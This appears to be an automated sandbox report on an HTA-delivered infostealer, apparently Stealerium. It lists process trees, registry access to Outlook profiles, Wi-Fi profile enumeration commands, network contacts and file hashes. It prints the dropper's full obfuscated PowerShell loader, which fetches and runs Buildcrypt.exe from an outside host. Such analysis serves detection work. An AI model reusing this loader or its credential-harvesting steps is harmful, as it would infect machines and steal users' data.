PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe
PID 3428 wrote to memory of 3036 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dxkEOJ($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp){[IO.File]::WriteAllBytes($jqyPVSgWqmmMsu, $aNoKIHhsKCDNWp)};function jjdeCQWVxw($jqyPVSgWqmmMsu){if($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58376,58384,58384))) -eq $True){rundll32.exe $jqyPVSgWqmmMsu }elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58388,58391,58325))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $jqyPVSgWqmmMsu}elseif($jqyPVSgWqmmMsu.EndsWith((sqawNbuSbNoQJZv @(58322,58385,58391,58381))) -eq $True){misexec /qn /i $jqyPVSgWqmmMsu}else{Start-Process $jqyPVSgWqmmMsu}};function HbrgwLHwrnHIIKcXF($PsSShlejHlmIATZ){$DiupfoBkkti = New-Object (sqawNbuSbNoQJZv @(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aNoKIHhsKCDNWp = $DiupfoBkkti.DownloadData($PsSShlejHlmIATZ);return $aNoKIHhsKCDNWp};function sqawNbuSbNoQJZv($IGSmIy){$qiARGdapNw=58276;$oaVnqUhEZ=$Null;foreach($PnrRNHiYycYQVcn in $IGSmIy){$oaVnqUhEZ+=[char]($PnrRNHiYycYQVcn-$qiARGdapNw)};return $oaVnqUhEZ};function SSSHxFUz(){$SrNKPGroYNNtLyR = $env:AppData + '\';$mVYpdLNFBXXciTDAvNH = $SrNKPGroYNNtLyR + 'Document.pdf';If(Test-Path -Path $mVYpdLNFBXXciTDAvNH){Invoke-Item $mVYpdLNFBXXciTDAvNH;}Else{ $lyGsxYZsmNE = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,58388,58376,58378));dxkEOJ $mVYpdLNFBXXciTDAvNH $lyGsxYZsmNE;Invoke-Item $mVYpdLNFBXXciTDAvNH;};$bblLmj = $SrNKPGroYNNtLyR + 'Buildcrypt.exe'; if (Test-Path -Path $bblLmj){jjdeCQWVxw $bblLmj;}Else{ $SlNerqupbdAkKp = HbrgwLHwrnHIIKcXF (sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,58392,58322,58377,58396,58377));dxkEOJ $bblLmj $SlNerqupbdAkKp;jjdeCQWVxw $bblLmj;};;;;}SSSHxFUz;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

"C:\Users\Admin\AppData\Roaming\Buildcrypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B1BA23CBB6B8ADE984E66F02BD8FFBCB --renderer-client-id=2 --mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4AFFB00DA70C44E89F0006F7A791B52 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0DAD23F905662147322197BCAE29E9B2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0DAD23F905662147322197BCAE29E9B2 --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F6D819C2C95458AFCD482D7629D9A50 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9B94B64419BE447393C0FAA7D9D790F7 --mojo-platform-channel-handle=2844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F5F8B806EAD2D2C82F04826F782E692 --mojo-platform-channel-handle=2928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 104.18.114.97:80 icanhazip.com tcp
US 162.159.135.233:443 discordapp.com tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 152.199.19.74:80 tcp
US 8.8.8.8:53 udp
N/A 51.11.168.232:443 tcp
US 8.8.8.8:53 udp
N/A 51.11.168.232:443 tcp
N/A 51.11.168.232:443 tcp
US 8.8.8.8:53 udp
GB 104.77.160.31:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.242.39.171:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 51.38.43.18:443 tcp
US 8.8.8.8:53 udp
N/A 31.14.70.246:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

memory/952-0-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/952-2-0x0000000002800000-0x0000000002836000-memory.dmp

memory/952-1-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/952-3-0x0000000005370000-0x0000000005998000-memory.dmp

memory/952-4-0x0000000005180000-0x00000000051A2000-memory.dmp

memory/952-6-0x0000000005AC0000-0x0000000005B26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4somwvmw.4ed.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/952-5-0x0000000005A50000-0x0000000005AB6000-memory.dmp

memory/952-16-0x0000000005C90000-0x0000000005FE4000-memory.dmp

memory/952-17-0x00000000061B0000-0x00000000061CE000-memory.dmp

memory/952-18-0x0000000006200000-0x000000000624C000-memory.dmp

memory/952-19-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/952-22-0x0000000006740000-0x0000000006762000-memory.dmp

memory/952-21-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/952-20-0x0000000007390000-0x0000000007426000-memory.dmp

memory/952-23-0x00000000079E0000-0x0000000007F84000-memory.dmp

memory/952-24-0x0000000008610000-0x0000000008C8A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 380888258d0c8d18da63e80591a4e0f3
SHA1 70ef5767c29304806ccc4cd136d9c5bfd8dcf403
SHA256 eaaefbc4c960dca1de30c44f0fccbbefdb9c3e0e243e7ff5579316b99206b8e0
SHA512 63104e4e2e6b260522c26a28287684bb8dab433d4b03396e30b478288980d15d4d259d873f1f59eda364ec777bcdc79f481b11890178a012f2bc483497c4e3b3

memory/1000-40-0x0000000000700000-0x000000000071C000-memory.dmp

memory/1000-41-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/1000-42-0x0000000005100000-0x0000000005110000-memory.dmp

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 1146d3a15130bd2c5fdfae7ea6cd78a3
SHA1 0a2a1406b135a5f2b7c57aec1c8cdb53c1b6b22f
SHA256 0f5890a4dc9f8f4ae0967c8958cf02f70009dd3748268d33c8acf06226cdba2a
SHA512 dd6cebb5b0bf8e06d32da44fd9d1d12ee7c0e88efd0fe80a62f9cc5bc6c0fc8266f9d1ca9883e1f12039e2587a52f8f679d00d7cb506115204435779d6c7dc96

C:\Users\Admin\AppData\Roaming\Document.pdf

MD5 80a2593453c09724d152e841a3ff0865
SHA1 c73c293d18aac71c530d69ea03314f064f5c6386
SHA256 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd
SHA512 ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67

memory/1000-44-0x0000000006A80000-0x0000000006C8A000-memory.dmp

memory/1000-45-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-46-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-48-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-52-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-50-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-54-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-56-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-58-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-62-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-66-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-68-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-70-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-72-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-64-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-74-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-76-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-78-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-80-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-82-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-84-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-86-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-90-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-92-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-94-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-96-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-88-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-60-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-100-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-102-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-98-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-104-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-106-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-108-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/952-655-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c26ed30e7d5ab440480838636efc41db
SHA1 c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591
SHA256 6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef
SHA512 96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 b65b0fffc080d61f81df44a349dcbd5e
SHA1 8540e8fc99e86275493bffb8e0224a29b6f4d6e5
SHA256 6cd8bc3eedeaf4ef2d54af586634e03d8bf7f9a3fdf4256f86a3dd4d006440f7
SHA512 29f48f648ba705f29522d0dab95afe44cccb878610a6ecb45bb7131834a31de97bf8f3683ef8a946389507faa90296c1bd33063dba43fc5e95640c1b8f529bdc

memory/1000-1093-0x00000000028E0000-0x00000000028E1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 daf72125c1f6c2c88d6a41564d3f025e
SHA1 dbe3ad9f09bdda33f0f318b0d766375baf1fc1f9
SHA256 91241978919b4738d0be1891144d0614903a08b1e1975e425407e4694ca342b2
SHA512 1133b6013f5a4132d21b208b4a8622e1fd0ae409acdf535d24f00e985bc7387b27407f7cd8bd991e33255cc4752794f6015c0580bdd3885e1b1d6af7665a9776

memory/1000-1106-0x0000000005950000-0x0000000005AF2000-memory.dmp

memory/1000-1107-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

memory/4664-1113-0x0000000000400000-0x0000000000592000-memory.dmp

memory/4664-1114-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/1000-1115-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 ebaf811ecff8139439cbcad21e0788d5
SHA1 f494b3df2a71e137f86b7e9b6f06f6a659534311
SHA256 3b1dce1a2e8e3753e7a29b43946c83be26ac9d28de854bae2a81e37af5c58349
SHA512 62580c267c09b181f9772d8d132738240022d9abb3c1a89d564c4f0e0d0a2f59161a7527e0d6799cfc1fd5176670d7231d3a7eceb31a4bb3db59f4854efc2219

memory/4664-1121-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1127-0x0000000005180000-0x0000000005188000-memory.dmp

memory/4664-1126-0x00000000059E0000-0x0000000005A06000-memory.dmp

memory/4664-1125-0x0000000005950000-0x00000000059E2000-memory.dmp

memory/4664-1129-0x0000000006830000-0x0000000006838000-memory.dmp

memory/4664-1130-0x0000000006850000-0x000000000686E000-memory.dmp

memory/4664-1128-0x0000000006820000-0x000000000682A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

MD5 27fda8b4ccd36e3f67a3567b72d190ff
SHA1 23a3af45be473349ef5425af4523899c50ce76d8
SHA256 a696b5a790f107591693870ea2dcc3ace5f8ab11fa192435e99f1c70a7c4b90a
